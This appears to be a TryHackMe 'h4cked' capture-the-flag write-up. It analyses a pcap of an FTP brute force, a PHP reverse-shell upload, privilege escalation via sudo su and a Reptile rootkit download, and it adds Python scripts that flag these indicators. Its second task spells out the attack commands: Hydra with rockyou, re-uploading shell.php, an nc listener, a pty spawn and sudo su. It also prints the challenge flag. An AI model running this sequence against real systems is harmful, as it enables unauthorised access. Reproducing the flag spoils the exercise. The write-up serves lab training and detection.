TryHackMe: h4cked

Information

Find out what happened by analysing a .pcap file and hack your way back into the machine. It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.

Room: h4cked
Difficulty: Easy
Files: Capture.pcapng (120 KB)

Task 2 can be completed with the Attack Box.

My Recommendations

Download it from the room, no verification hashes are provided so … trust your gut.

This is my personal preference: I like being organized and deleting a folder when I'm done with it.

    mkdir -p Documents/TryHackMe/h4cked && cd Documents/TryHackMe/h4cked

You can check that Wireshark is installed from your terminal with:

    wireshark -h

Then open the pcapng file in Wireshark:

    wireshark Capture.pcapng

Walkthrough

Task 1: Oh no! We've been hacked!

1. The attacker is trying to log into a specific service. What service is this?

Just by peeking into the pcapng file, we can see a series of FTP login requests:

Answer: FTP

2. There is a very popular tool by Van Hauser which can be used to brute force a series of services. What is the name of this tool?

Googling for ‘Van Hauser FTP Bruteforce’ returns a link to the tool's GitHub repository.

Answer: hydra

3. The attacker is trying to log on with a specific username. What is the username?

We previously saw that the attacker is trying to log in with the username ‘jenny’.

Answer: jenny

4. What is the user's password?

Filtering the pcap with ‘ftp’, there are a series of unsuccessful logins. The only successful login request is in packet 394.

The correct password is ‘password123’.

Answer: password123

5. What is the current FTP working directory after the attacker logged in?

Packet 401 has the response ‘"/var/www/html" is the current directory’:

Answer: /var/www/html

6. The attacker uploaded a backdoor. What is the backdoor's filename?

After getting FTP access, the attacker used the STOR command to upload the file ‘shell.php’:

The attacker then gave it read, write and execute permissions (CHMOD 777).

Answer: shell.php

7. The backdoor can be downloaded from a specific URL, as it is located inside the uploaded file. What is the full URL?

Now, we can switch the filter to ‘ftp-data’. This filter matches the FTP data channel (port 20), which carries the actual file contents. Packet 431 contains the data for shell.php, which has a size of 5493 bytes.

The script’s usage includes a link in case ‘you get stuck’:

Opening the link in a browser redirects to a different page, ‘tools/web-shells/php-reverse-shell/’. The shell can be downloaded as a tar.gz archive:

Clicking on the download link redirects again to the same URL as in the script, but with php-reverse-shell-1.0.tar.gz appended:

The answer is the same as the URL in the ‘shell.php’ file, which is also the base of the final download URL.

Answer: http://pentestmonkey.net/tools/php-reverse-shell
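To make the Task 1 FTP analysis repeatable, here is an added Python example (not part of the original post or the room) that applies the same checks an analyst makes with the ‘ftp’ filter: it counts 530 failures to flag brute forcing, records the first 230 success together with the USER/PASS pair that preceded it, and pulls out the 257 working directory, STOR uploads and SITE CHMOD. The transcript is constructed; a real run would feed it the decoded control-channel lines from the capture.

```python
import re

# Constructed sample FTP control-channel transcript as Wireshark's 'ftp' filter
# would show it: 'C' = attacker to server, 'S' = server reply. Credentials and
# filename mirror the room; the guessed passwords and packet order are made up.
SAMPLE_FTP = [
    ("S", "220 (vsFTPd 3.0.3)"),
    ("C", "USER jenny"), ("C", "PASS 123456"), ("S", "530 Login incorrect."),
    ("C", "USER jenny"), ("C", "PASS qwerty"), ("S", "530 Login incorrect."),
    ("C", "USER jenny"), ("C", "PASS letmein"), ("S", "530 Login incorrect."),
    ("C", "USER jenny"), ("C", "PASS password123"), ("S", "230 Login successful."),
    ("C", "PWD"), ("S", '257 "/var/www/html" is the current directory'),
    ("C", "STOR shell.php"), ("S", "226 Transfer complete."),
    ("C", "SITE CHMOD 777 shell.php"), ("S", "200 SITE CHMOD command ok."),
]

def analyse_ftp(lines, fail_threshold=3):
    """Walk the control channel once and summarise the attacker's actions:
    530 failures, first 230 success (user, password, failures before it),
    257 working directory, STOR'd filenames, SITE CHMODs, brute-force flag."""
    summary = {"failed": 0, "login": None, "cwd": None, "uploads": [], "chmod": []}
    user = password = None
    for direction, line in lines:
        if direction == "C":
            verb, _, arg = line.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                user = arg
            elif verb == "PASS":
                password = arg
            elif verb == "STOR":
                summary["uploads"].append(arg)
            elif verb == "SITE" and arg.upper().startswith("CHMOD"):
                # "CHMOD 777 shell.php" -> ["777", "shell.php"]
                summary["chmod"].append(arg.split(None, 2)[1:])
            continue
        code = line[:3]                     # three-digit FTP reply code
        if code == "530":
            summary["failed"] += 1
        elif code == "230" and summary["login"] is None:
            summary["login"] = (user, password, summary["failed"])
        elif code == "257":
            m = re.match(r'257 "([^"]*)"', line)
            summary["cwd"] = m.group(1) if m else None
    summary["brute_force"] = summary["failed"] >= fail_threshold
    return summary

if __name__ == "__main__":
    print(analyse_ftp(SAMPLE_FTP))
```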

8. Which command did the attacker manually execute after getting a reverse shell?

Packet 350 shows the HTTP request for shell.php. This packet is part of tcp.stream 19. We can filter for the next stream, ‘tcp.stream == 20’, then select Analyze -> Follow -> TCP Stream:

The first command is ‘whoami’.

Answer: whoami

9. What is the computer's hostname?

In the third command, after ‘whoami’ and ‘ls -la’, the attacker runs a python3 one-liner:

The hostname is the part after the @ sign in the prompt, which is wir3.

Answer: wir3

10. Which command did the attacker execute to spawn a new TTY shell?

As we saw above, the attacker ran a python3 one-liner using the pty module. pty is the Python module for ‘Pseudo-terminal utilities’.

Answer: python3 -c 'import pty; pty.spawn("/bin/bash")'

11. Which command was executed to gain a root shell?

After spawning the new shell, the attacker used ‘su’ to switch to the jenny user. Then, the attacker checked what jenny is allowed to run with sudo using the ‘sudo -l’ command.
The attacker then ran ‘sudo su’ to open a root shell and get all privileges.

The command to get to the root shell was ‘sudo su’. The response to the ‘whoami’ command confirmed it was a root shell.

Answer: sudo su

12. The attacker downloaded something from GitHub. What is the name of the GitHub project?

After getting into the root shell, the attacker cloned the repository Reptile:

Answer: Reptile

13. The project can be used to install a stealthy backdoor on the system. It can be very hard to detect. What is this type of backdoor called?

Reptile is an LKM (Loadable Kernel Module) Linux rootkit. Because it runs inside the kernel, it can keep root access while hiding its own files, processes and network activity from normal user-space tools.

Answer: rootkit
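The same idea applied to the followed TCP stream from questions 8 to 13, as an added example that is not from the original post: it reads the prompts to recover the hostname and current user, keeps the attacker's commands in order, and flags the TTY upgrade, the su to jenny, sudo -l, sudo su and the Reptile clone. The transcript, its output lines and the clone URL are constructed placeholders, not taken from the capture.

```python
import re

# Shell prompt as the pty sends it back, e.g. "jenny@wir3:/var/www/html$ ".
PROMPT = re.compile(r"^(?P<user>[\w-]+)@(?P<host>[\w.-]+):(?P<cwd>\S+)[$#]\s*$")

# Constructed transcript of the followed TCP stream: 'C' = attacker input,
# 'S' = what the victim sent back. The command sequence mirrors the room; the
# output text and the clone URL are placeholders, not taken from the capture.
SAMPLE_STREAM = [
    ("C", "whoami"), ("S", "www-data"),
    ("C", "ls -la"), ("S", "total 12"),
    ("C", "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'"),
    ("S", "www-data@wir3:/$ "), ("C", "su jenny"), ("S", "Password: "),
    ("S", "jenny@wir3:/$ "), ("C", "sudo -l"), ("S", "(ALL : ALL) ALL"),
    ("S", "jenny@wir3:/$ "), ("C", "sudo su"),
    ("S", "root@wir3:/# "), ("C", "whoami"), ("S", "root"),
    ("S", "root@wir3:/# "), ("C", "git clone https://EXAMPLE-PLACEHOLDER/Reptile.git"),
]

# Indicators a detection rule would key on, in the order the room shows them.
INDICATORS = [
    ("tty_upgrade", re.compile(r"pty\.spawn\(")),
    ("user_switch", re.compile(r"^su\s+\S+")),
    ("sudo_enum", re.compile(r"^sudo\s+-l\b")),
    ("root_shell", re.compile(r"^sudo\s+(su|-i|-s)\b")),
    ("rootkit_fetch", re.compile(r"^git\s+clone\s+\S*Reptile", re.I)),
]

def analyse_stream(lines):
    """Return the hostname seen in prompts, every attacker command tagged with the
    user it ran as (None before the TTY upgrade), and the indicator hits in order."""
    host = current_user = None
    commands, hits = [], []
    for direction, line in lines:
        if direction == "S":
            m = PROMPT.match(line)
            if m:                       # a prompt tells us who we are and where
                host, current_user = m["host"], m["user"]
            continue
        cmd = line.strip()
        commands.append((current_user, cmd))
        for name, pat in INDICATORS:
            if pat.search(cmd):
                hits.append((name, current_user, cmd))
    return {"host": host, "commands": commands, "hits": hits}

if __name__ == "__main__":
    for hit in analyse_stream(SAMPLE_STREAM)["hits"]:
        print(hit)
```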

Task 2: Hack your way back into the machine

The attacker has changed the user’s password! Can you replicate the attacker’s steps and read the flag.txt? The flag is located in the /root/Reptile directory. Remember, you can always look back at the .pcap file if necessary. Good luck!

First, we need to find the new password. We can do so with Hydra, passing the rockyou wordlist:

    hydra -l jenny -P /usr/share/wordlists/rockyou.txt ftp://10.10.12.184

Now that we know the password, we can connect to the FTP server:

    ftp 10.10.12.184

Before editing the shell.php file, we need to find the IP address of our machine:

    ifconfig

Now that we know the IP, we can download the file from the FTP server, edit it locally, and re-upload it:

    get shell.php
    # edit shell.php locally: change the ip value to your VPN IP and the port to 1234
    put shell.php
    chmod 777 shell.php

We also need to start a listener for the reverse shell:

    sudo nc -lvn 1234

Now, we can open our browser of choice and navigate to the web application by entering the IP address of the FTP machine followed by /shell.php:

    10.10.12.184/shell.php

As the page loads, the reverse shell connects back to our listener. We then redo the attacker's steps:

    python3 -c 'import pty; pty.spawn("/bin/bash")'
    su jenny
    sudo su
    cat /root/Reptile/flag.txt

Answer: ebcefd66ca4b559d17b440b6e67fd0fd

TLDR

– This is a good challenge to show how a blue team can analyze a capture and recover the information a ‘red team’ would need.

– The blue team part is rather straightforward and requires only a basic understanding of Wireshark.
